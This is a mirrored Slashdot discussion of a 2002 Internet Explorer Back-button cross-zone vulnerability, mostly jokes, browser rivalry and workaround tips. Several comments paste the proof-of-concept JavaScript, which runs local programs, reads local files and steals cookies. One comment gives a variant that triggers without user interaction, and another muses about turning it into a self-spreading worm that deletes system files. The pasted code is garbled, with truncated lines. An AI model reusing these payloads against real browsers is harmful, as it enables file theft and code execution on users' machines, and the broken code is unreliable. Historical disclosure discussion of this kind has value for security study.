Slashdot Mirror
Don't Hit That Back Button
Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."
With every passing week, MS gives us more and more reasons not to use their POS browser. Whereas Mozilla is quickly becoming the undisputed king; tabbed browsing, filtering popups, better security options, and .. oh yeah, it's open source.
;-)
Take that, Microsoft.
Don't hit that 'REPLY' button. It may post a goatse link!!!
...
Sheesh, what really needs to be said here? Internet Explorer is full of more bugs than a $19.95 roadside motel. I can't wait for the explaination for this one out of Monopolis (AKA Redmond, WA).
-- We live in a world where lemonade is artificial and soap has real lemon.
Attack of the Back Button -- "Getting stuck on a web page can be painful. The back button doesn't always work. While there are many ways to escape from web pages, many users don't know the tricks. A company can stop hurting users by doing more testing, using proper development methods, and being aware of the issue."
How to Download YouTube Videos
I wanted to go back and vote on the poll!
Someone pick "insurace companies" for me.
Unless you can't go back either.
Hmmm....
Interestingly enough, McAfee caught it and labled it a .vir right after I doubled clicked on the test html....
Posted to MS in november and it still happens... I would think that this would be a top priority to get fixed. only because it can be uses in bad ways.
Using open source software is harmful as well, pressing any button is likely to cause it to segfault
But it shows a definate flaw in the design of the browser. The source of the HTML has some intresting stuff in it as well...though I am surpised that this applies to all versions of IE. I suppose this comes down to IE executing scripts outside of the sandbox huh? Pretty simple to fix, disable all java script.
Please note that I'm not responsible if that breaks websites.
Om, nomnomnom...
So it may not matter.
http://arizona.diamondbacks.mlb.com crashes both IE6 and IE5.
I don't know why. Could be the address it crashes at has a hardware problem on my machine. But why is java poking around my hardware?
Java is insecure, Windows is insecure, the Internet is insecure, and everyone using them has always known that.
--Blair
I don't have anything special in my Google cookies and I like to play minesweeper.
... but the damn lameness filter got me. I can't even whore for karma - i'm too lame. gutted.
IE has had so many security issues it's not even funny, yet it remains the most used browser on the internet.
What would be really nifty is is somebody started tracking the bugs in IE, and when they are reported. I bet you could start to predict the next one by using incedents, lines of code, and release number.
I predict there will be a new one right about
Now.
"Do or do not, there is no try." -Yoda
*Pause*
*DEEP BREATH!*
*SIGH!*
And people wonder why the hell I turn off Java and Javascript....
And it will until the dubious day that M$ gets its "shiznatz" straight.
But NOOO! It's SO much "cooler" to have a bunch of javascript crap in your page just to make it that much harder to browse!
Security my 3X wide, high-arched, hairy-toed, bunioned FOOT!
Chas - The one, the only.
THANK GOD!!!
Would a vulnerability still exist if a user wrote a page that redirected the browser to some page with malicious code in the target, and then, with a little bit of javascript set the location to javascript:history.back() (i.e. on mouse movement or whatever). Would this cause the javascript to run under the improper security settings, or does the user actually have to hit the "back" button?
The worst thing about the Bug is that "Exploit has only been tested on fully patched IE 6.0, with Win XP and Win2000 pro" I cant wait to automatically install Gator when I accidently click a popunder advertisment and try to back out of it. I guess I should update my IE 6.0 ... Oh wait that doesn't work.....
if common sense was common, wouldn't everyone have it?
<html>m 32/winmine.exe')">t em32/winmine.exe')">& gt;m / )">
// Use if not XP1 ';' )";
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/sys
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
(As the author of this reply submits it via IE. Ah, the irony :-)
There's no point in being grown up if you can't be childish sometimes. -- Dr. Who
If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.
Doesn't this violate the GPL?
I still can't figure out why people are using IE, seriously. I use opera, and its is so much more stable it isn't funny. The speed and resources used are much better. I love mouse gestures, and I've removed the whole back button panel, I just hold the right mouse down and click the left, to go forward, hold the left and click right.
The only complaint, is that some improper css and js screw with it. Its far better then dealing with IE bugs, especially if people were to start using opera, then webpages would be tested with it.
I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.
This is a very troubling security hole for Windows users who prefer IE (99.7% of them).
Founder, monolinux
If you celebrate Xmas, befriend me (538
Back in 1999, when the dot-coms were flying high and my company resembled an Internet startup (although we had been in business since 1992), we hastily set up new offices and cubicles with little regard for information security. After all, what was the worst that could happen - an email worm? Well, we quickly found out: a malicious hacker had targeted our company, and sent an email to "all @" my domain containing a link to a supposed Yahoo News story. Unfortunately, this link sent the employees to a malicious site that caused their insecure IE browsers to yield control of nearly every Windows PC in the company to the intruder. They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.
A few weeks after the incident, our vice president of operations mandated a Mozilla-only policy. Employees were forbidden from running IE, Lynx (another notoriously insecure browser), and Konqueror (which crashed constantly anyway). Since that time, we have had zero browser related security issues, and employees waste far less time surfing the web, mainly because a lot of time-wasting sites only work in Microsoft standards-compliant browsers. Converting to Mozilla has been a win-win situation, and I fully expect the same to be happening across America after this latest IE security breach. Enough is enough; we need to take back control of our networks.
"Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."
That's pretty long time (5-6 months, too lazy to figure out the actual number of days etc.) that Microsoft has done nothing (at least not a fix). Especially because this overlaps the time when they decided to make their people go to security workshops (or some such). If they can't even fix a known, reported bug in the security how can they find them on their own and fix them? Or not write them in the future?
Oh yeah, it'd be nice to know if I can get around this by doing "right-click" / "back" or if that is affected and not JUST the toolbar.
No sig for you.
Are the problems with MS and the fast approching 1.0 release of Mozilla signs that IE is fading? Let us postulate yes for a second. IF we do, then might we consider that the decline of IE is a sign that MS and most of its applications are going to slowly wither as faster better and cheaper alternatives become availible? (despite the fact that engineers say faster better cheaper pick any two). Assuming that IE is foreshadowing the decline of many MS apps and OSs in the future, what will replace them? MS makes some usefull, albiet very buggy software (Office). It is a shame there is no better standard for computer users. Can MS shift its buisness focus to software exclusivly? or perhaps to the OS market exclusivly and dump Office and the rest under Open-Source. I think these are interesting possibilities to explore.
Sig (appended to the end of comments you post, 120 chars)
the back button doesn't work as expected. I end up opening every link in a new window, closing windows becomes my back button. Is it really hard to make the back button have *exactly* this behavior? (hint, if pressing the back button reloads the page, you have failed.) Looks like programmers avoid doing the simplest thing because bloat is expected these days.
This doesn't exactly strengthen the arguments of those who believe that IE is the best browser (cough, cough, such as yours truly), that's for sure.
/. I don't have an innate bias against Microsoft and don't mind using their software if it gets the job done but if even using the back button on my browser can someone fsck me up, well, it's time to consider some radical alternatives. Linux and a browser should run pretty sweet on a 1Ghz AMD...
This little incident explains in detail why I've slowly stripped as much Microsoft software from my system as possible. Unlike many on
You want to know who isn't running Firefox 2.x? They spell it "definately" and "rediculous".
> and a forced bug fix for everybody on XP?
WTF are you talking about? Do you even use XP? There are no "forced" fixes that I've seen. (Unless you're an idiot, and you specificly told XP to automaticly download and install all fixes.) XP does _NOT_ force fixes on me. Simply put, whenever a new update is available, a little tiny globe pops up by my clock and says "Hey, there's a new update."
I can click on it if I want, it doesn't take control of my mouse. It doesn't force me to click on it.
Once I _DO_ click on it, it simply states:
"There is such and such a fix, as per this KB article. Click [here] to read on the fix. Click [install] to install, [remind me later] to remind me later, or [go the fuck away] to have this go away."
Quzah.
" 'Using the Back Button in IE is dangerous'." - since when was using anything in IE safe? ;o)
Video Game cheats, hints a
Other then just clicking on the MS link, is there a site devoted just to the fuckups of MS? From calling the GPL cancer to dumb ass bugs like this, I would love a good site so that every time I see a post on shacknews that says "People just hate MS because everyone hates them, Windows 98 was fine and worked great for me"
The ultimate network admin tool needs HELP!
Bench the latest Mozilla build (turn off debugging and turn on optimization, just like a normal release build) and post that again. Of course, to really shine, run it on Linux or a free BSD.
Seriously, it's fast and its implementation of little things like CSS (which as far as I'm concerned is the future of online content) is light years ahead if IE anyways.
Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version. That's right, the MS-IE-Mac-port team did it so much better that they backported it to Windows. That's where the speed and decent standards support came from!
I think that this goes to show that Microsoft doesn't re-write something from scratch on purpose. They had to force their Mac team to basically do so (because, like, it's IE not on Windows, you have to redo a bunch of stuff) before they figured out that they needed to reimplement. The sad thing is that they don't seem to be willing to do it where it counts, no matter how "security focused they become" they don't ever figure out that it's impossible to effectively rewrite Windows "a piece at a time".
I think Mauve has the most RAM. --PHB (Dilbert Comic)
I copied the HTML onto my webserver deliberately, and tried it out -- the exploit worked as expected EXCEPT when my virus scanner was on. Then I couldn't even save the web page when I copied the text to it. So a virus scanner prevents a IE bug? Weird.
At first I thought wuh? But of course I was in Mozilla, so I didn't see the problem. IE executed it exploit right away.
Free Software ought to get better press from this, as it underscores a major truism.
In Free Software, new versions are generally made and released due to added functionality or fixed bugs. Anything else is a waste of time for the programmers, right?
With the exception of a very huge vulnerability that was finally fixed with IE SP2 (though who knows what else that contained), new software versions from Microsoft seem due to an entirely different set of reasons, like:
- breaking more fledgling standards
- making news
- embracing/extending
- press releases
- etc
Yea, they were only notified Nov. 21, 2001 and then notified again with more info Mar. 25, 2002. They had no clue..
In Microsoftese, this is called "innovation".
Of course, can you name one feature of IE that isn't dangerous? Well, other than clicking File/Close
mmm... yeah... You see, we're putting the cover sheets on all TPS reports now before they go out...
Mozilla 1.0 RC1 release possible tomorrow.
Can you invoke this by using history.go(-1); ?
http://diesel.2y.net/mine.htm
my McAfee VirusScan already checks for this bug.
THERE IS NO DATA. THERE IS O
Don't be silly. Opera is king, and always will be. www.fudo.org in the phorums for in depth conversations on this. Mozilla = Sex with Porcupine Opera - Sex with MILF. Need I say more?
If you read the exploit, you would see why this would not be possible.
You do not need to actually press the button, but you need to do it from a trusted page.
I'm a concientious
n/t = nice troll
Microsoft seems to really be taking it in the shorts of late -- you can't help but feel a little sympathy watching the pathetic Benny-Hill skit that is their attempt at "trustworthy computing". Feels like the blonde's lost her dress and an angry mob is chasing Gates through the streets of London in double-time. Even hindsight makes it seem that much more pathetic.
What the hell... YUP. Hey, you're formatting my hard drive! Bastard! :)
(IE6 + XP [Un]Professional)
This is one of the most beautiful bugs I've ever seen - Microsoft is clearly an innovator in bringing ever-more-advanced, aesthetically-pleasing bugs to customers.
Seriously though... there is a true elegance to this vulnerability that one rarely sees in the usual passel of buffer overflows, etc.
This bug combines a canonical and visceral piece of browser functionality (back-button) with a conceptually and technically advanced, as well as invisibly-controlled piece of browser functionality (site-specific browser security settings). What wonderful juxtaposition!
C'mon! At least this is far better than the usual "ironic" bugs that come up (i.e. default passwords in a security program - har-de-har-snore).
When I spent hours in labs browsing with Netscape 2.0...
When a webpage wasn't something you had to figure out how to escape...
When 'Back' meant back...
When there was just smooth uninterrupted navigation, and no pop-ups or banners...
When people could say pretty much say anything anywhere, no DMCA...
... remember that?
The coolest voice ever.
Would it be possible for a malicious page to load a trusted page in another frame, pause for it to load, then execute a back() in that frame? There are loads of things that javascript isn't allowed to do in a frame from another website, but is back() among them?
If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.
You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.
It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.
But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Don't say the word "minesweeper!"
r e. .
Must...not...play...addictive...game...any...mo
I had the habit kicked and then you went and threw me into a relapse. Shite. Oh well, here goes another 30 wasted minutes of my time...
+1 Insightful, -1 Troll. What can I say, I'm an Insightful Troll.
And this poped up. Was I hacked?
What is pirate software? Software for inventory of stolen treasure?
I tried to reply to say "At least slashdot doesn't have any bugs in it", but the reply button wasn't working...
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
You can trace the decline the the use of the name 'longhorn' to the decline.
Never, never, never use a slaughter animal as a product codename.
What happened, did someone trip over the power cord to the database server or something? (slashdot was down again)
in IE 5.1 for OSX 10.1.3 it simply does not allow you to go back. wow microsofty makes better shit for the mac than the pee cee!
I want 2D games back.
For those not aware of his problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!
While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.
Loneliness is a power that we possess to give or take away forever
My virus scanner (mcaffee virus scan for nt with all the latest patterns) picked this up as the "exploit-codebase" virus.
:) Maybe it's just telling me the browser is a virus :P
Wonderful isn't it when an anti virus product picks up a bug in your browser?
I mean, we've rebooted Windows countless times. Windows 2000 and XP come in and the number of reboots has dropped significantly. I'm sure many customers reported this problem to Microsoft, so they inserted a security bug so that the safest way to go back is to start the browser again. I'm sure disgruntled customers will be happy to see the old times again :)
I am soooo much better then all of u sKripT kiddies.
I bet none of uz can haxor me!
www.megarad.com
How can M$ have armies enginineers working an entire month on security and not fix a serious known bug? How is it freaking "trustworthy computing" when you know about a bug for six months and not fix it! I think this proves that the month long security blitz was just a load of marketing crap.
I guess I can feel 'least a little smug by the fact that almost from the start I've opened links in new windows.
cheers
Rock and roll. I set a new record. I haven't played minesweeper since... win98SR1!
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
I found the same bug in Mozilla last summer while I was working at Netscape. My boss fixed it within a week, so versions after Mozilla 0.9.3 did not have the bug. It was bug 88167 if you're interested. I'm not sure why I didn't notice that IE was vulnerable as well. Anyone want to go through old Mozilla security holes and see how many of them affect IE 6?
Anyway, keep using that Back button. If you're using IE to browse warez/porn, you have more to worry about than someone looking at your cookie for another site. An attacker could just copy the IE exploit of the week from
http://jscript.dk/unpatched/. I believe that page has had current IE security holes that allow running arbitrary instructions for two months straight. (That means you can keep up with the latest IE patches, but if an attacker reads jscript.dk and can get you to click a link in AIM or read a message in OE, the attacker wins.)
By the way, what's with IE turning every cross-domain hole into a full remote compromise by letting sites link to res: urls? Current versions of Mozilla block links to chrome/res and even file, so a cross-domain hole doesn't even let sites read local files.
The shareholder is always right.
Open Source is the Way
1)Bundled....people are sheep.
2)Bundled.....a lot of people dont have the band or the patience to do a lot of downloading (AOL users on dialup)
3)Bundled...on a corporate win2k desktop where the user just logins in and cant really install much in the way of software...see 1) s/pc support personal/people
I don't really think so.
Up until recently (i.e. Moz and Opera maturing in to decent browsers) IE was the best game in town, it was just an added bonus that it came bundled.
Netscape 4.x has been a joke since IE's renderer got good (around 4.5, I'd say), and Netscape 6.0 release bugs scared a lot of people off.
Most people have never even heard of Opera.
However, if the new browsers keep improving, and IE holes keep appearing with this kind of severity, I can see people downloading other browsers, just like they used to.
But really, until late last year, IE, in all it's mediocrity, was still the best for most people's browsing.
It's reasonably stable, reasonably fast and renders pages reasonably well.
There was no incentive to switch to something either obselete (old Netscape), slow (new Netscape), buggy (Mozilla), or pretty much unknown (Opera).
There might be now.
C-X C-S
i just clicked the back button on the preview window.. really..
The war with islam is a war on the beast
The war on terror is a war for peace
Read, people... Read, then make comments. It's not that difficult.
You can leave javascript enabled, and you can still go back without triggering the attack script if you do the following:
The itty-bitty down-arrow to the right of the back button opens a brief session history. Select the second entry from the top, and you are 'back'. The script is not triggered. This also works great on annoying pages that don't let you go back. Note: you would normally select the top entry to go back one page, but not with this exploit, so I guess just watch for the error page and remember to hit the second one down.
Train yourself to do this and you're ok. You'll even find that you actually *use* the feature to skip back multiple pages rather than clicking several 'backs' in a row...
The scary part is that most people wont be aware of this. I've been trying (unsuccessfully) to get it to run deltree to see if that would work, but the command needs backslashes in the path argument, and of course they're being stripped out. Nothing I've tried has worked, and I'm hoping that it's just impossible.
whenever "accidently" browsing to a porn site...sitting there calmly results in a couple of pop-ups and the goodies I mean offensive material presented to you.
hit that back button, and WHAM!!!!!! A million pop-ups and flurry of pages, plus they make your default page their home page, and all sorts of crap....
i've learned that the back button is a no-no.
"Alt-F4"
you can nuke windows faster then they can pop-up with that sucker.
;-)
Whoops, copied winmine to the system32 folder, now it works. Going to stick with mozilla for a while.
Here is a way do disable this nasty bug. It should work in all affected versions of IE:
1. Right click the toolbar, and select "Customize"
2. Select "Back" in the list marked "Current toolbar buttons"
3. Click the "Remove" button.
4. Click close.
There! Now that bug has been squashed. I suggest you implement this in all corporate deployments of IE pronto.
the more i love my mac. none of this did a bloody thing on osx / ie 5.1.4
maybe it's the fix we got today, though
"Win treats sysadmins better than users. Mac treats users better than sysadmins. Linux treats everyone like sysadmins."
'Using the Back Button in IE is dangerous'.
That was supposed to be 'Using IE is dangerous'.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
mozilla cant even render the encarta.com site correctly
This site lists dozens of IE holes, 13 of which still are open!
13 remote compromises in a web browser!?!?! Good to see that Microsofts one month 'security' jihad went so well.
Even if an executable were encoded in the link would the end user not be simply warned that they are attempting to download an executable, as with any other URL that served them an executable?
It's only a security hole if delivering the content via the data URL is treated differently than getting it via an http, ftp or javascript one.
Boffoonery - downloadable Comedy Benefit for Bletchley Park
.. do a little something like this:
m 32/net send * \"HI EVERYBODY IN THE OFFICE! I AM LOOKING AT PORN!\"')">CLICK FOR BOOBIES</a>
<a href="javascript:execFile('file:///c:/winnt/syste
I want Mozilla to give me the netscape finger.
Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.
Will I retire or break 10K?
Good thing security is MicroSoft's number one focus now!
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
Step One: Move the mouse pointer to the toolbar containing the forward and back buttons. Point to any part of the toolbar EXCEPT either the forward or back buttons. Empty areas or other buttons are fine.
Step Two: Use the mouse button you have configured to bring up the context menus. On most systems this will be the right mouse button and is often refered to as "Right Clicking".
Step Three: From the context menu select the option CUSTOMIZE...
Step Four: In the Customize Toolbar window will be two boxes full of items. Use the scroolbar to browse the contents of the right-most box and look for the button that says "BACK". Highlight the "BACK" button item.
Step Five: FNORD
Step Six: Press the REMOVE button between the left and right item boxes.
Step Seven: Press the upper right most button marked "CLOSE".
Your browser should now be immune to this exploit. Share and Enjoy.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
First off, had you bothered to do any research, RFC 2397 defines the data: URL scheme--this isn't some Mozilla debug thing, as you foolishly asserted. Second, you haven't actually demonstrated how this behaves differently from a normal URL. If you click http://this.is.a.url/ and the document at the end has a meta refresh to goatse.cx, how is that different from a data: URL (other than the data:URL being easier to spot)? Same deal with a shell script or .exe; it won't autorun any more than if you clicked on a link and got in through HTTP.
/. moderation in succumbing to a good line of BS.
I'm not sure whether you actually believe you've found a vulnerability, or are just trolling for Konqueror; either way, it illustrates the weakness of
It's amazingly EASY to grab someone's cookie information with this technique.
To protect yourself and your users don't store anything in cookies. Or wait until 99.9% of the populaton has a IE version larger than 6. ( which might be forever )
Your site is protected if you use sessions though.
Even if the session ID is saved on the visitors computer. All that would be shown are the last two session IDs.
Free Web based FTP
Here at uni, all the win2000 machines (too lazy to walk to the cs building) run McAfee Virus Scan.
When I tried to save the exploit code from the bugtraq archive, it pops up to tell me the file is infected with 'Exploit-CodeBase'. Fair enough, I thought, McAfee is certainly on the ball today, getting an update out so quickly.
On further inspection, however, the virus definition file was updated on the 10th of April!. According to the bugtraq message, it was only made public on the 14th. I'm not sure, but isn't only the vendor involved given advanced warning about exploits? How on earth did Network Associates know?
I think you're referring to ECMAScript formerly called JavaScript
First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).
Will I retire or break 10K?
to not use javascript. That is the first thing I disable in any browser I use, with activex/java being the second.
Really, it's so much more secure without all that crap active, that I don't know why any half way security concious person would do anything else.
Maybe the "Act" they performed was mostly theatrical.
Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
/. would not let me browse at 0 or -1, and would not let me reply to a post. What happened?
Microsoft - Where would you like to go today, Maybe Jail?
I'm not sure about the other (commercial or open source) browsers. However, I use a Mac OS X Cocoa broswer, called Omniweb [http://www.omnigroup.com/products/omniweb/]. It has a feature where the user can stop loading individual parts of a page. For instance, say you're loading a page with 60 images. Normally, you'd click the stop or back button in a browser. In Omniweb, the text would still load - but you could stop loading some of the larger images.
If you go to a form , say an amazon purchase site or something where you have to pay....
then after that say , the moment after hitting 'purchase' or 'submit' you then decide or 'goodie' lets save the page to disc, Mozilla will 're-send' the request thereby making a double-purchase.
Now that is lame, surely the webpage is in its internal cache, why cant it just save that without doing any NETWORK 'submits' or requests.
tsk tsk
pretty soon when vulnerabilities like this come out, we can say 'don't worry... you're an AOL user'. ;)
did i just see a pig fly by my window?
The exploit also works in IE5.5.
"Rating: Medium because user interaction is needed"?! What's the chance that the user will hit the back button when they think it will take them back to a porn image gallery, 80%?
The shareholder is always right.
... or is that because i'm using opera?
-D
This type of bug shouldn't really be a problem for anyone running a virus checker that's worth its beans. Just keep it set to check javascript and it should shout at you any time something like this tries to bite you.
I'm sure that Micro$ofts legions of monkeys hammering away at keyboards will eventually hit the right combination of keys to fix the problem.
If they notice or not is a whole other issue. ;-)
Damn it! I went to the test page and tried all the links with the back button. Not one of them worked. Not a one. There is a bug in the bug when it comes to Mac OS X and Internet Explorer. Once again as a Mac user, I am getting deprived of the same experience that Windows users get with Internet Explorer.
Strange women lying in ponds distributing swords is no basis for a system of government.
This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer.
However, I rechecked the back button bug that Mac OS X users experience where minesweeper will not launch on the test pages. Mac OS X IE v5.1.4 does not resolve the user experience issue for Mac users.
Strange women lying in ponds distributing swords is no basis for a system of government.
Yes,I saw the joke. I liked it too. I just used your post to vent something that's been bugging me for a long time. Your post was the minor imperfection on the beer glass of the world which allowed the seed of my thought to find purchase and rise to the surface as a big festering bubble of disgust. How very Zen. I think I'll go write Haiku...
Seriously, though, I once had to spend a week testing alternate browsers so that I could develop a test plan to replace IE on the machine in our NOC (after one of them got rooted when an operator was browsing warez and pr0n sites). I'm bitter about IE. And I had a nasty day at work (wrestling with CorporateTime's horrible attempt at an API, if you must know) so I had to vent. And for that I must thank you. I feel much better without all that painful gas pressure.
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .
// Use if not XP
' )";
----cut here---
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about: ";
function execFile(file){
alert (badUrl);
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}
---cut here---
_
If you don't install windows onto the c drive(or at all), then you're all good. If it's coded, then the coder must assume things about the targets. You start assigning arbitrary drive letters, that will surely mess with something.
-D
sorry forgot the extrans correct page attached
m 32/calc.exe')">m 32/calc.exe')">& gt;m / )">
// Use if not XP
1 ';' )";
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about:<html><body onload=javascript:history.back() ><form><input type=button onclick=javascript:history.back()> </form></body></html>";
function execFile(file){
alert (badUrl);
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
_
I can confirm that this also works in IE 5.5 under Win2K with all updates/patches.
We're going to make information free Mr. Anderson, whether you like it, or not.
Why mozilla's security hole never been posted on slashdot ? I have the impression that slashdot try to make IE looks bad. Am I right ?
Is a fix for the back button exploit really as important as something like the following?
Q310510: Recommended Update Download size: 220 KB, 1 minuteThis update resolves the "Playback and Copy-Protection Issues When You Try to Play the Snow White and the Seven Dwarfs DVD Movie" issue in Windows XP and is discussed in Microsoft Knowledge Base (KB) Article Q310510. Download now to be able to play Disney's "Snow White and the Seven Dwarfs" Platinum Collection DVD.
For more information about this issue, read Microsoft KB Article Q310510. (This site may be in English.)
I do understand the case to the full extent and yet I cannot find the part that warrants a Slashdot main page report.
What if parent said since when was using anything in Mozilla safe ? Will it still be funny ? NO! -1 Flamebait ?
Do you think when they fix the bug that launches minesweeper they will also fix the one that launches Solitaire?
Say someone where to take the code a gentleman posted below with a autoback initiated in script and then picked a open relay and fired it at a few million email addresses? Say for instance that it also sent copies of itself to others in the process? Say for instance it also calls cmd.exe to delete anything it can in the system directories.
;)
Ahhhh amusing it would be
Got Code?
This here is my sig. Is it not nifty? Worship the sig. (Sorry Pete)
Is good, I like.
Rhapsody in Numbers
Maybe I patched it somewhere with one of the numerous bugfixes out there, but when I try this exploit, it pops up an ActiveX security warning and refuses to execute the exploit.
Of course, this may be due to a 3rd party security patch that I saw on a website as opposed to an official MS one?
"Nothing strengthens authority so much as silence." - Charles de Gaulle
I have not seen a popup add in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have java script turned off. I have always thought that Java Script, captive X etc were the scourge of the internet.
